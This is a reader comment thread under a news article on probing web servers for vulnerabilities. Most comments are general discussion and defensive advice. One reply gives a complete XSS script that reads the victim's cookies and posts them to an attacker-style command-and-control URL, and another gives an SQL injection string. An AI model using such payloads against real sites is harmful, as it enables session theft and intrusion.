Sign in / up

back to article Sealed with an XSS: Popular vulnerabilities probed

If we have internet-facing web servers (and other types of server, for that matter) we care about how vulnerable they are to attack. There are loads of services out there that you can use to probe your public-facing systems, and they'll tell you loads of useful stuff about why they might be vulnerable. But of course they're only …

COMMENTS

Post your comment
House rules Send corrections
Add to 'My topics' unstar *
  1. Anonymous Coward
    Anonymous Coward

    XSS....

    Code sample example please...............?

    0 0 Reply
    1. RichMcc
      Reply Icon

      Re: XSS....

      <script type="text/javascript">

      function SlurpData() {

      var d = document.cookie;

      var params = JSON.stringify({ data: d });

      var xmlHttp = new XMLHttpRequest();

      xmlHttp.onreadystatechange = function () {

      if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {

      alert("All Your Sessions Are Belongs to me!");

      }

      }

      xmlHttp.open("post", "www.pwn.org/CandC.asmx/Slurp", true);

      xmlHttp.setRequestHeader("content-type", "application/json; charset=utf-8");

      xmlHttp.setRequestHeader("Content-length", params.length);

      xmlHttp.setRequestHeader("Connection", "close");

      xmlHttp.send(params);

      }

      SlurpData();

      </script>

      4 0 Reply
      1. Anonymous Coward
        Reply Icon
        Anonymous Coward

        "All Your Sessions Are Belongs to me!"

        Cheers @ RichMcc

        0 0 Reply
  2. 0laf
    Thumb Up

    Ta

    Nice article cheers. Passed onto some guys that wonder why I always raise these topics with web based systems.

    1 0 Reply
  3. Alan J. Wylie

    Obligatory XKCD

    https://xkcd.com/327/

    3 0 Reply
    1. John G Imrie
      Reply Icon

      Re: Obligatory XKCD

      Hello '; SELECT * FROM users where id = 22991

      1 0 Reply

  4. This post has been deleted by its author

  5. Charlie Clark Silver badge

    SQL Injection - escaping is never enough

    Passing parameters is far more important than trying to escape them: if your setup doesn't let you do this, change it.

    Wrap all queries in views and only accept http-post queries with CSRF tokens.

    0 0 Reply
  6. Quando

    Do they mention anything about getting people to login via https rather than http?

    1 0 Reply

POST COMMENT House rules

Not a member of The Register? Create a new account here.

Forgotten password ?

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like